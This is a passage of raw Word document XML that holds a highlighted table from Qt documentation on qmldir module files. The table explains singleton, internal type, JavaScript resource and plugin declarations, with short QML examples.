            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="string"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>"green"</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Style w:val="comment"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>// qmldir declaring the singleton type</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module CustomStyles</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singleton Style </w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="number"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>1.0</w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> Style</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qml</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Style w:val="comment"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>// singleton type in use</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import </w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="type"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>QtQuick</w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="number"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>2.0</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import CustomStyles </w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="number"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>1.0</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Text {</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    font</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pixelSize: Style</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textSize</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    color: Style</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textColor</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="002C2AE0" w:rsidRPr="002C2AE0" w:rsidRDefault="002C2AE0">
            <w:pPr>
              <w:pStyle w:val="HTML0"/>
              <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">text: </w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="string"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>"Hello World"</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="002C2AE0" w:rsidRPr="002C2AE0" w:rsidRDefault="002C2AE0">
            <w:pPr>
              <w:pStyle w:val="HTML0"/>
              <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C2AE0" w:rsidRPr="002230B8" w:rsidTr="002C2AE0">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C2AE0" w:rsidRPr="002C2AE0" w:rsidRDefault="002C2AE0">
            <w:pPr>
              <w:pStyle w:val="HTML0"/>
              <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="kwd"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFF55"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>internal</w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>&lt;</w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="typ"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="4F9D08"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>TypeName</w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>&lt;</w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="typ"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="4F9D08"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>File</w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3663" w:type="pct"/>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C2AE0" w:rsidRPr="0035707C" w:rsidRDefault="002C2AE0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Declares an object type that is in the module but should not be made available to users of the module.</w:t>
            </w:r>
            <w:r w:rsidR="0035707C">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="0035707C" w:rsidRPr="0035707C">
              <w:rPr>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Internal types of module</w:t>
            </w:r>
            <w:r w:rsidR="0035707C">
              <w:rPr>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</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Zero or more internal object type declarations may exist in the</w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>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color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>file.</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Example:</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internal MyPrivateType MyPrivateType</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qml</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 xml:space="preserve">This </w:t>
            </w:r>
            <w:r w:rsidRPr="0035707C">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>is necessary if the module may be imported remotely</w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> (see</w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:hyperlink r:id="rId294" w:anchor="remotely-installed-identified-modules" w:history="1">
              <w:r w:rsidRPr="002C2AE0">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Remotely Installed Identified Modules</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>) because if an exported type depends on an non-exported type within the module, the engine must also load the non-exported type.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C2AE0" w:rsidRPr="002230B8" w:rsidTr="002C2AE0">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2C2AE0" w:rsidRPr="002C2AE0" w:rsidRDefault="002C2AE0">
            <w:pPr>
              <w:pStyle w:val="HTML0"/>
              <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="tag"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>&lt;ResourceIdentifier&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="tag"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>&lt;InitialVersion&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="tag"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>&lt;File&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3663" w:type="pct"/>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2C2AE0" w:rsidRPr="002C2AE0" w:rsidRDefault="002C2AE0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Declares a </w:t>
            </w:r>
            <w:r w:rsidRPr="0035707C">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>JavaScript file</w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> to be made available by the module. The resource will be made available via the specified identifier with the specified version number.</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Zero or more JavaScript resource declarations may exist in the</w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>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color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">file, however each JavaScript resource </w:t>
            </w:r>
            <w:r w:rsidRPr="0035707C">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>must have a unique identifier</w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> within any particular version of the module.</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Example:</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MyScript </w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="number"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>1.0</w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> MyScript</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js</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See the documentation about</w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:hyperlink r:id="rId295" w:history="1">
              <w:r w:rsidRPr="002C2AE0">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>defining JavaScript resources</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>and</w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:hyperlink r:id="rId296" w:history="1">
              <w:r w:rsidRPr="002C2AE0">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Importing JavaScript Resources In QML</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>for more information.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C2AE0" w:rsidRPr="002C2AE0" w:rsidTr="002C2AE0">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C2AE0" w:rsidRPr="002C2AE0" w:rsidRDefault="002C2AE0">
            <w:pPr>
              <w:pStyle w:val="HTML0"/>
              <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t xml:space="preserve">plugin </w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>&lt;</w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="typ"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="4F9D08"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>Name</w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>[&lt;</w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="typ"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="4F9D08"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>Path</w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>&gt;]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3663" w:type="pct"/>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C2AE0" w:rsidRPr="002C2AE0" w:rsidRDefault="002C2AE0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Declares a </w:t>
            </w:r>
            <w:r w:rsidRPr="0035707C">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>plugin</w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> to be made available by the module.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="002C2AE0" w:rsidRPr="002C2AE0" w:rsidRDefault="002C2AE0" w:rsidP="00064AC7">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="21"/>
              </w:numPr>
              <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
              <w:ind w:left="525"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:color w:val="404244"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="HTML2"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="404244"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>&lt;Name&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:color w:val="404244"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">is the plugin library name. This </w:t>
            </w:r>
            <w:r w:rsidRPr="0035707C">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>is usually not the same as the file name of the plugin binary</w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
